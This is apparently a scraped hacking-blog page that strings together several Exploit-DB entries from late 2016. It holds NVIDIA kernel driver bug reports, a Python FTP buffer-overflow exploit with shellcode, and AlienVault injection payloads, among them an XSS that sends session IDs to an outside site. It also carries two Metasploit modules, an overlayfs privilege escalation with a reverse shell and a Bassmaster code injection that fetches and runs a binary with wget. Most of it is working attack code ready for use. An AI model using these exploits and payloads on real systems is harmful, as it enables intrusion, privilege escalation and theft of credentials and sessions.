Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=936
The DxgkDdiEscape handler for 0x7000170 lacks proper bounds checks for the variable size
input escape data, and relies on a user provided size as the upper bound for writing output.
Crashing context with PoC (Win 10 x64 with 372.54):
KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
...
rax=fffff801f417e600 rbx=0000000000000000 rcx=0000000000000002
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000
rip=fffff801f4152b75 rsp=ffffd000287b4468 rbp=ffffd000287b53e8
r8=fffff801f4169e24 r9=ffffd000287b5620 r10=ffffd000287b5620
r11=0000000000000450 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz ac pe nc
dxgkrnl!_report_gsfailure+0x5:
fffff801`f4152b75 cd29 int 29h
Resetting default scope
EXCEPTION_RECORD: ffffd000287b4228 -- (.exr 0xffffd000287b4228)
ExceptionAddress: fffff801f4152b75 (dxgkrnl!_report_gsfailure+0x0000000000000005)
ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000002
Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE
To reproduce, compile the PoC as a x64 binary (requires linking with
setupapi.lib, and WDK for D3DKMTEscape), and run. It may require some changes
as for it to work as the escape data must contain the right values (e.g. a
field that appears to be gpu bus device function). My PoC should hopefully set
all the right values for the machine it's running on.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40662.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863291720
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=937
The DxgkDdiEscape handler for 0x5000027 accepts a user provided pointer,
but does no checks on it before using it.
...
DWORD* user_ptr = escape_5000027_data->user_ptr;
v32 = user_ptr[2];
v33 = user_ptr + 3;
if ( v32 != -1 )
v33 = (_DWORD *)v32;
sub_91C24(miniport_context_, *user_ptr, user_ptr[1], v33, (__int64)&escape_data_);
...
The PoC I’ve provided causes a read on said pointer, but based on inspecting where this pointer
is passed it seems like there is at least 1 code path that can result in a write (I haven't
confirmed this though).
(On Win 10 x64 with 372.54)
FAULTING_IP:
nvlddmkm!nvDumpConfig+1338c7
fffff801`8a26a79f 8b4808 mov ecx,dword ptr [rax+8]
CONTEXT: ffffd00023649970 -- (.cxr 0xffffd00023649970)
rax=4141414141414141 rbx=ffffd0002364a870 rcx=0000000005000017
rdx=ffffd0002364a498 rsi=0000000000000000 rdi=ffffd0002364a498
rip=fffff8018a26a79f rsp=ffffd0002364a390 rbp=ffffd0002364a4a9
r8=ffffd0002364a870 r9=ffffe8023c537220 r10=0000000000000000
r11=ffffd0002364a370 r12=ffffe8023c537220 r13=fffff80189fa9370
r14=ffffe000d6f2a000 r15=ffffe8023c537220
iopl=0 nv up ei pl zr na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246
nvlddmkm!nvDumpConfig+0x1338c7:
fffff801`8a26a79f 8b4808 mov ecx,dword ptr [rax+8] ds:002b:41414141`41414149=????????
Resetting default scope
To reproduce, compile PoC as a x64 executable and run (requires WDK for D3DKMTEscape).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40663.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=940
The DxgkDdiEscape handler for 0x70001b2 doesn't do proper bounds checks for its
variable size input.
void sub_8C4304(...) {
...
// escape_->size is controlled by the user.
if ( escape_->size < size )
size = escape_->size;
memcpy(escape_->data, v31, 28i64 * size);
...
}
Note that this appears to be a common pattern. Normally, before
escape handlers are executed, |PrivateDriverDataSize| (from DXGKARG_ESCAPE)
is checked to be equal to some value against a hardcoded table. However, some escapes
allow a more relaxed check that |PrivateDriverDataSize| >= minimum. This means that
the handler themselves must implement an ad hoc bounds check, which either seems to be
missing or implemented incorrectly (relying on a user specified value) in many cases.
bug 936 is a similar issue and there are likely more. I've noticed (but not confirmed)
a few more OOB reads that I haven't reported that follow this same pattern.
Crashing context with PoC (Win 10 x64 with 372.54):
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
...
rax=ffffd000239d51dc rbx=0000000000000000 rcx=fffffffffffffff4
rdx=fffff000e9e6c754 rsi=0000000000000000 rdi=0000000000000000
rip=fffff80166d6aca0 rsp=ffffd000239d3df8 rbp=ffffd000239d3f00
r8=0000000000000924 r9=000000000000003b r10=000000000000e9ef
r11=ffffd000239d48ac r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz ac pe cy
nvlddmkm+0x5daca0:
fffff801`66d6aca0 f30f7f40f0 movdqu xmmword ptr [rax-10h],xmm0 ds:ffffd000`239d51cc=????????????????????????????????
Resetting default scope
To reproduce, compile as an x64 executable an run (requires WDK for D3DKMTEscape).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40664.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=942
The DxgkDdiEscape handler for escape 0x100009a lacks proper bounds checks:
case 0x100009A:
...
size_0 = escape_data->size_1;
...
size_1 = 2 - (escape_data->unknown < 18);
...
size_2 = escape_data->size_2;
...
total_size = size_0 * size_1 * size_2;
...
if (total_size > 0x10)
do_debug_thingo();
if (total_size) {
DWORD* ptr = alloced_buf + 24;
DWORD* user_buf = escape_data->data;
...
while (total_size) {
*(ptr - 1) = *(user_buf - 1);
*ptr = *user_buf;
...
user_buf += 4;
ptr += 39;
--total_size;
}
There is a check that total_size > 0x10, which calls some kind of a
debug/logging function (do_debug_thingo in my pseudocode), but it does not
actually stop processing of the escape. This leads to buffer overflow on the
allocated pool buffer later on.
Note that there is also a potential integer overflow in the calculation of
|total_size|. Since the individual sizes (size_0, size_1, size_2) appear to be
stored in a struct and eventually passed off to another function, there may be
more problems later on too.
Crashing context with PoC (Win10 x64 with 372.54):
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
...
rax=00000000caa6ed30 rbx=0000000000000000 rcx=ffffc001cd337044
rdx=00000000000f41bd rsi=0000000000000000 rdi=0000000000000000
rip=fffff80102461188 rsp=ffffd000243bbed0 rbp=ffffd000243bbfd0
r8=0000000000000000 r9=0000000000000000 r10=0000000000000000
r11=0000000000000000 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
nvlddmkm!nvDumpConfig+0x12a2b0:
fffff801`02461188 8941fc mov dword ptr [rcx-4],eax ds:ffffc001`cd337040=????????
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40665.zip
import socket
import sys
import os
print '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScrR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: FreefloatFTPserver1.0_dir_command_remotecode_exploit
# Date: 2016.11.02
# Exploit Author: Greg Priest
# Version: FreefloatFTPserver1.0
# Tested on: Windows7 x64 HUN/ENG Professional
'''
ip = raw_input("Target ip: ")
port = 21
overflow = 'A' * 247
eip = '\xF4\xAF\xEA\x75' + '\x90' * 10
#shellcode calc.exe
shellcode =(
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
"\x53\x53\x53\x53\x52\x53\xff\xd7")
remotecode = overflow + eip + shellcode + '\r\n'
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((ip ,port))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASSW hacker@hacker.net\r\n')
s.recv(1024)
print '''
Successfull Exploitation!
'''
message = 'dir ' + remotecode
s.send(message)
s.recv(1024)
s.close
Details
=======
Product: Alienvault OSSIM/USM
Vulnerability: PHP Object Injection
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8580
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2
Vulnerability Details
=====================
A PHP object injection vulnerability exists in multiple widget files
due to the unsafe use of the unserialize() function. The affected
files include flow_chart.php, gauge.php, honeypot.php,
image.php,inventory.php, otx.php, rss.php, security.php, siem.php,
taxonomy.php, tickets.php, and url.php.
An authenticated attacker could send a serialized PHP object to one of
the vulnerable pages and potentially gain code execution via magic
methods in included classes.
POC
====
This benign POC injects the IDS_Report class from PHPIDS into the
refresh parameter of image.php. The __toString method of IDS_Report is
then executed and the output is displayed in the value of the content
field in the response:
/ossim/dashboard/sections/widgets/data/image.php?type=test&wtype=blah&height=1&range=1&class=1&id=&adj=1&value=a%3A5%3A{s%3A3%3A%22top%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22adjustment%22%3Bs%3A8%3A%22original%22%3Bs%3A6%3A%22height%22%3Bs%3A3%3A%22123%22%3Bs%3A7%3A%22refresh%22%3BO%3A10%3A%22IDS_Report%22%3A3%3A{s%3A9%3A%22%00*%00events%22%3Bs%3A9%3A%22testevent%22%3Bs%3A7%3A%22%00*%00tags%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22%00*%00impact%22%3Bs%3A16%3A%22Object+Injection%22%3B}s%3A7%3A%22content%22%3Bs%3A36%3A%22aHR0cDovL3d3dy50ZXN0LmNvbS8xLnBuZw%3D%3D%22%3B}
Timeline
========
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2
References
==========
https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
Details
=======
Product: Alienvault OSSIM/USM
Vulnerability: Stored XSS
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8581
CVSS: 3.5
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2
Vulnerability Details
=====================
A stored XSS vulnerability exists in the User-Agent header of the
login process. It's possible to inject a script into that header that
then gets executed when mousing over the User-Agent field in Settings
-> Current Sessions.
POC
===
The POC uses jQuery to send all session IDs on the "Current Sessions"
page to an arbitrary site (Google, in this case)
<script>$('#ops_table
.ops_id').each(function(){$.get("https://www.google.com/",{session:($(this).html())});});</script>
Timeline
========
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2
References
==========
https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
Details
=======
Product: Alienvault OSSIM/USM
Vulnerability: SQL Injection
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8582
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2
Vulnerability Details
=====================
A SQL injection vulnerability exists in the value parameter of
/ossim/dashboard/sections/widgets/data/gauge.php on line 231. By
sending a serialized array with a SQL query in the type field, it's
possible to execute an arbitrary SQL query. The result is not
displayed on the screen, but it can be exploited as a blind SQLi or
have the output directed to a file and then retrieved via another
request. Authentication is required.
POC
===
This request will dump user password hashes to a file:
/ossim/dashboard/sections/widgets/data/gauge.php?&type=alarm&wtype=blah&asset=1&height=1&value=a%3A1%3A%7Bs%3A4%3A%22type%22%3Bs%3A67%3A%22pass+from+users+INTO+OUTFILE+%27%2Ftmp%2F10.0.0.123_pass_tshark.pcap%27--+-%22%3B%7D
The file containing the output can then be retrieved with the following request:
/ossim/pcap/download.php?scan_name=pass&sensor_ip=10.0.0.123
It's also possible to read the contents of any file readable by the
mysql user by using mysql's load_file function. For example, changing
the request to something like select load_file('/etc/passwd') .
Timeline
========
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2
References
==========
https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
<!--
Source: http://blog.skylined.nl/20161101001.html
Synopsis
A specially crafted webpage can cause Microsoft Internet Explorer 9 to reallocate a memory buffer in order to grow it in size. The original buffer will be copied to newly allocated memory and then freed. The code continues to use the freed copy of the buffer.
Known affected versions, attack vectors and mitigations
Microsoft Internet Explorer 9
An attacker would need to get a target user to open a specially crafted webpage. Disabling JavaScript should prevent an attacker from triggering the vulnerable code path.
-->
<!doctype html>
<script>
oTextArea = document.createElement('textarea');
oTextArea.dataSrc = 1;
oTextArea.id = 1;
oTextArea.innerHTML = 1;
oTextArea.onvolumechange = 1;
oTextArea.style.setProperty('list-style', "url()");
</script>
<!--
Analysis
The CAttrArray object initially allocates a CImplAry buffer of 0x40 bytes, which can store 4 attributes. When the buffer is full, it is grown to 0x60 bytes. A new buffer is allocated at a different location in memory and the contents of the original buffer is copied there. The repro causes the code to do this, but the code continues to access the original buffer after it has been freed.
Exploit
If an attacker was able to cause MSIE to allocate 0x40 bytes of memory and have some control over the contents of this memory before MSIE reuses the freed memory, there is a chance that this issue could be used to execute arbitrary code. I did not attempt to write an exploit for this vulnerability myself.
Timeline
- April 2014: This vulnerability was found through fuzzing.
- July 2014: This vulnerability was submitted to ZDI.
- July 2014: ZDI reports a collision with a report by another researcher. (From the credits given by Microsoft and ZDI, I surmise that it was Peter 'corelanc0d3r' Van Eeckhoutte of Corelan who reported this issue.
- October 2014: Microsoft release MS14-056, which addresses this issue.
- November 2016: Details of this issue are released.
-->
# thel3l
# Title: Citrix Receiver/Receiver Desktop Lock 4.5 Incorrect Access Control
# CVE: CVE-2016-9111
# Date of Discovery: October 27 2016
# Exploit Author: Rithwik Jayasimha
# Author Homepage/Contact: https://thel3l.me
# Vendor Name: Citrix
# Vendor Homepage: https://www.citrix.com/
# Software Link: Receiver - https://www.citrix.com/go/receiver.html
Receiver Desktop Lock - https://www.citrix.com/downloads/citrix-receiver/additional-client-software/receiver-desktop-lock-45.html
# Version: 10.6.3
# Tested on: Windows 8.1, macOS 10.12.1 Sierra
# Category: local
# Vulnerability type: Incorrect Access Control
# Description: Allows attacker with physical access to VDI to bypass authentication requirement. Citrix Receiver and/or Desktop Lock for Mac OSX and Windows suffer from a local incorrect access control.
To exploit this:
1. An attacker would first identify a VDI with a logged in user, which has been locked.
2. The attacker then proceeds to disconnect the system from the network temporarily (removing and reinserting the LAN cable is enough).
3. Citrix Receiver then proceeds to unlock the session and allows the attacker full access to the connected user's account without confirming the user's identity.
# Additional Notes, References and links:
* This exploit is not 100% reliable - it may take a couple of tries to be able to accurately reproduce this behavior.
* This attack has only been attempted with physical access - it may also be possible to remotely script a restart of a network adapter to cause the same behavior.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require "msf/core"
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Overlayfs Privilege Escalation',
'Description' => %q{
This module attempts to exploit two different CVEs related to overlayfs.
CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55
3.16.0-25 (14.10 default) < 3.16.0-41
3.19.0-18 (15.04 default) < 3.19.0-21
CVE-2015-8660:
Ubuntu:
3.19.0-18 < 3.19.0-43
4.2.0-18 < 4.2.0-23 (14.04.1, 15.10)
Fedora:
< 4.2.8 (vulnerable, un-tested)
Red Hat:
< 3.10.0-327 (rhel 6, vulnerable, un-tested)
},
'License' => MSF_LICENSE,
'Author' =>
[
'h00die <mike@shorebreaksecurity.com>', # Module
'rebel' # Discovery
],
'DisclosureDate' => 'Jun 16 2015',
'Platform' => [ 'linux'],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' =>
[
[ 'CVE-2015-1328', { } ],
[ 'CVE-2015-8660', { } ]
],
'DefaultTarget' => 1,
'DefaultOptions' =>
{
'payload' => 'linux/x86/shell/reverse_tcp' # for compatibility due to the need on cve-2015-1328 to run /bin/su
},
'References' =>
[
[ 'EDB', '39166'], # CVE-2015-8660
[ 'EDB', '37292'], # CVE-2015-1328
[ 'CVE', '2015-1328'],
[ 'CVE', '2015-8660']
]
))
register_options(
[
OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])
], self.class)
end
def check
def mounts_exist?()
vprint_status('Checking if mount points exist')
if target.name == 'CVE-2015-1328'
if not directory?('/tmp/ns_sploit')
vprint_good('/tmp/ns_sploit not created')
return true
else
print_error('/tmp/ns_sploit directory exists. Please delete.')
return false
end
elsif target.name == 'CVE-2015-8660'
if not directory?('/tmp/haxhax')
vprint_good('/tmp/haxhax not created')
return true
else
print_error('/tmp/haxhax directory exists. Please delete.')
return false
end
end
end
def kernel_vuln?()
os_id = cmd_exec('grep ^ID= /etc/os-release')
case os_id
when 'ID=ubuntu'
kernel = Gem::Version.new(cmd_exec('/bin/uname -r'))
case kernel.release.to_s
when '3.13.0'
if kernel.between?(Gem::Version.new('3.13.0-24-generic'),Gem::Version.new('3.13.0-54-generic'))
vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328")
return true
else
print_error("Kernel #{kernel} is NOT vulnerable")
return false
end
when '3.16.0'
if kernel.between?(Gem::Version.new('3.16.0-25-generic'),Gem::Version.new('3.16.0-40-generic'))
vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328")
return true
else
print_error("Kernel #{kernel} is NOT vulnerable")
return false
end
when '3.19.0'
if kernel.between?(Gem::Version.new('3.19.0-18-generic'),Gem::Version.new('3.19.0-20-generic'))
vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328")
return true
elsif kernel.between?(Gem::Version.new('3.19.0-18-generic'),Gem::Version.new('3.19.0-42-generic'))
vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660")
return true
else
print_error("Kernel #{kernel} is NOT vulnerable")
return false
end
when '4.2.0'
if kernel.between?(Gem::Version.new('4.2.0-18-generic'),Gem::Version.new('4.2.0-22-generic'))
vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660")
return true
else
print_error("Kernel #{kernel} is NOT vulnerable")
return false
end
else
print_error("Non-vuln kernel #{kernel}")
return false
end
when 'ID=fedora'
kernel = Gem::Version.new(cmd_exec('/usr/bin/uname -r').sub(/\.fc.*/, '')) # we need to remove the trailer after .fc
# irb(main):008:0> '4.0.4-301.fc22.x86_64'.sub(/\.fc.*/, '')
# => "4.0.4-301"
if kernel.release < Gem::Version.new('4.2.8')
vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660. Exploitation UNTESTED")
return true
else
print_error("Non-vuln kernel #{kernel}")
return false
end
else
print_error("Unknown OS: #{os_id}")
return false
end
end
if mounts_exist?() && kernel_vuln?()
return CheckCode::Appears
else
return CheckCode::Safe
end
end
def exploit
if check != CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
end
filename = rand_text_alphanumeric(8)
executable_path = "#{datastore['WritableDir']}/#{filename}"
payloadname = rand_text_alphanumeric(8)
payload_path = "#{datastore['WritableDir']}/#{payloadname}"
def has_prereqs?()
gcc = cmd_exec('which gcc')
if gcc.include?('gcc')
vprint_good('gcc is installed')
else
print_error('gcc is not installed. Compiling will fail.')
end
return gcc.include?('gcc')
end
compile = false
if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'
if has_prereqs?()
compile = true
vprint_status('Live compiling exploit on system')
else
vprint_status('Dropping pre-compiled exploit on system')
end
end
if check != CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
end
def upload_and_chmod(fname, fcontent, cleanup=true)
print_status "Writing to #{fname} (#{fcontent.size} bytes)"
rm_f fname
write_file(fname, fcontent)
cmd_exec("chmod +x #{fname}")
if cleanup
register_file_for_cleanup(fname)
end
end
def on_new_session(session)
super
if target.name == 'CVE-2015-1328'
session.shell_command("/bin/su") #this doesnt work on meterpreter?????
# we cleanup here instead of earlier since we needed the /bin/su in our new session
session.shell_command('rm -f /etc/ld.so.preload')
session.shell_command('rm -f /tmp/ofs-lib.so')
end
end
if compile
begin
if target.name == 'CVE-2015-1328'
# direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size
# Also removed the on-the-fly compilation of ofs-lib.c and we do that manually ahead of time, or drop the binary.
path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-1328', '1328.c')
fd = ::File.open( path, "rb")
cve_2015_1328 = fd.read(fd.stat.size)
fd.close
# pulled out from 1328.c's LIB define
path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-1328', 'ofs-lib.c')
fd = ::File.open( path, "rb")
ofs_lib = fd.read(fd.stat.size)
fd.close
else
# direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size
path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-8660', '8660.c')
fd = ::File.open( path, "rb")
cve_2015_8660 = fd.read(fd.stat.size)
fd.close
end
rescue
compile = false #hdm said external folder is optional and all module should run even if external is deleted. If we fail to load, default to binaries
end
end
if compile
if target.name == 'CVE-2015-1328'
cve_2015_1328.gsub!(/execl\("\/bin\/su","su",NULL\);/,
"execl(\"#{payload_path}\",\"#{payloadname}\",NULL);")
upload_and_chmod("#{executable_path}.c", cve_2015_1328)
ofs_path = "#{datastore['WritableDir']}/ofs-lib"
upload_and_chmod("#{ofs_path}.c", ofs_lib)
cmd_exec("gcc -fPIC -shared -o #{ofs_path}.so #{ofs_path}.c -ldl -w") # compile dependency file
register_file_for_cleanup("#{ofs_path}.c")
else
cve_2015_8660.gsub!(/os.execl\('\/bin\/bash','bash'\)/,
"os.execl('#{payload_path}','#{payloadname}')")
upload_and_chmod("#{executable_path}.c", cve_2015_8660)
end
vprint_status("Compiling #{executable_path}.c")
cmd_exec("gcc -o #{executable_path} #{executable_path}.c") # compile
register_file_for_cleanup(executable_path)
else
if target.name == 'CVE-2015-1328'
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-1328', '1328')
fd = ::File.open( path, "rb")
cve_2015_1328 = fd.read(fd.stat.size)
fd.close
upload_and_chmod(executable_path, cve_2015_1328)
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-1328', 'ofs-lib.so')
fd = ::File.open( path, "rb")
ofs_lib = fd.read(fd.stat.size)
fd.close
ofs_path = "#{datastore['WritableDir']}/ofs-lib"
# dont auto cleanup or else it happens too quickly and we never escalate ourprivs
upload_and_chmod("#{ofs_path}.so", ofs_lib, false)
# overwrite with the hardcoded variable names in the compiled versions
payload_filename = 'lXqzVpYN'
payload_path = '/tmp/lXqzVpYN'
else
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8660', '8660')
fd = ::File.open( path, "rb")
cve_2015_8660 = fd.read(fd.stat.size)
fd.close
upload_and_chmod(executable_path, cve_2015_8660)
# overwrite with the hardcoded variable names in the compiled versions
payload_filename = '1H0qLaq2'
payload_path = '/tmp/1H0qLaq2'
end
end
upload_and_chmod(payload_path, generate_payload_exe)
vprint_status('Exploiting...')
output = cmd_exec(executable_path)
output.each_line { |line| vprint_status(line.chomp) }
end
end
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Bassmaster Batch Arbitrary JavaScript Injection Remote Code Execution',
'Description' => %q{
This module exploits an un-authenticated code injection vulnerability in the bassmaster
nodejs plugin for hapi. The vulnerability is within the batch endpoint and allows an
attacker to dynamically execute JavaScript code on the server side using an eval.
Note that the code uses a '\x2f' character so that we hit the match on the regex.
},
'Author' =>
[
'mr_me <mr_me@offensive-security.com>', # msf
'Jarda Kotesovec' # original bug finder
],
'References' =>
[
[ 'CVE', '2014-7205'],
[ 'URL', 'https://nodesecurity.io/advisories/bassmaster_js_injection'], # nodejs advisory
],
'License' => MSF_LICENSE,
'Platform' => ['linux', 'bsd'], # binary > native JavaScript
'Arch' => [ARCH_X86, ARCH_X86_64],
'Privileged' => false,
'Targets' =>
[
[ 'Bassmaster <= 1.5.1', {} ] # Other versions are also affected
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 1 2016'))
register_options(
[
Opt::RPORT(8080), # default port for the examples/batch.js file
OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/batch"]), # default route for the examples/batch.js file
OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),
], self.class)
end
def check
# So if we can append an encapsulated string into the body
# we know that we can execute arbitrary JavaScript code
rando = rand_text_alpha(8+rand(8))
check = "+'#{rando}'"
# testing
requests = [
{:method => "get", :path => "/profile"},
{:method => "get", :path => "/item"},
{:method => "get", :path => "/item/$1.id#{check}"}, # need to match this /(?:\/)(?:\$(\d)+\.)?([^\/\$]*)/g;
]
post = {:requests => requests}
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(datastore['URIPATH']),
'ctype' => 'application/json',
'data' => post.to_json
})
# default example app
if res and res.code == 200 and res.body =~ /#{rando}/
return CheckCode::Vulnerable
# non-default app
elsif res and res.code == 500 and res.body =~ /#{rando}/
return CheckCode::Appears
end
return CheckCode::Safe
end
def on_request_uri(cli, request)
if (not @pl)
print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
return
end
print_status("#{rhost}:#{rport} - Sending the payload to the server...")
@elf_sent = true
send_response(cli, @pl)
end
def send_payload
@bd = rand_text_alpha(8+rand(8))
pn = rand_text_alpha(8+rand(8))
register_file_for_cleanup("/tmp/#{@bd}")
cmd = "wget #{@service_url} -O \\x2ftmp\\x2f#{@bd};"
cmd << "chmod 755 \\x2ftmp\\x2f#{@bd};"
cmd << "\\x2ftmp\\x2f#{@bd}"
pay = ";require('child_process').exec('#{cmd}');"
# pwning
requests = [
{:method => "get", :path => "/profile"},
{:method => "get", :path => "/item"},
{:method => "get", :path => "/item/$1.id#{pay}"}, # need to match this /(?:\/)(?:\$(\d)+\.)?([^\/\$]*)/g;
]
post = {:requests => requests}
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(datastore['URIPATH']),
'ctype' => 'application/json',
'data' => post.to_json
})
# default example app
if res and res.code == 200 and res.body =~ /id/
return true
# incase we are not targeting the default app
elsif res and res.code == 500 and es.body !=~ /id/
return true
end
return false
end
def start_http_server
@pl = generate_payload_exe
@elf_sent = false
downfile = rand_text_alpha(8+rand(8))
resource_uri = "\\x2f#{downfile}"
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
else
srv_host = datastore['SRVHOST']
end
# do not use SSL for the attacking web server
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end
@service_url = "http:\\x2f\\x2f#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"
service_url_payload = srv_host + resource_uri
print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
datastore['SSL'] = true if ssl_restore
connect
end
def exploit
start_http_server
if send_payload
print_good("Injected payload")
# we need to delay, for the stager
select(nil, nil, nil, 5)
end
end
end
# Exploit Title: SunellSecurity NVR / Cams - Buffer overflow in CGI
# Date: 11.2.2016
# Exploit Author: qwsj
# Vendor Homepage: https://github.com/qwsj
# Version: 1.6.08-09 / 2.0.06-08
# Tested on: Windows / Linux
Bug in CGI scrypt's for develop.
Web service buffer overflow and leading to a stop web service, and the device rebooted.
